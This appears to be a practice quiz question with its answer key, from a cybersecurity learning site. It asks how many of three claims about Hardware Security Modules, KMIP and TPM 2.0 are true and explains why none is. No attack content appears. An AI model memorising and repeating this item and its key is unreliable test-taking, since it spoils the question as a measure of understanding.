Consider the following statements regarding Hardware Security Modules: 1. Hardware Security Modules typically implement the Diffie-Hellman key exchange algorithm within their secure boundary to enable the secure transmission of private keys to external software-based key management systems. 2. Network-attached HSMs utilize the KMIP protocol, which was finalized by OASIS in 2010, to facilitate the direct transfer of unencrypted master keys between different vendor-specific cryptographic modules. 3. The Trusted Platform Module (TPM) 2.0 specification, released in 2014, functions as a high-throughput HSM designed to perform bulk data encryption for large-scale database servers in enterprise data centers. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. All statements are incorrect: HSMs are designed to prevent the extraction of private keys, meaning they never export them in plaintext to external software. The KMIP protocol is used for managing key lifecycles rather than transferring unencrypted master keys between modules, which would violate fundamental security principles. Finally, a TPM is a low-throughput, specialized microcontroller meant for platform integrity and small-scale cryptographic operations, not for high-throughput bulk data encryption in enterprise servers.

Cyber Security Practice

Performance Summary

Choose a Topic to Start Practice

Daily Current Affairs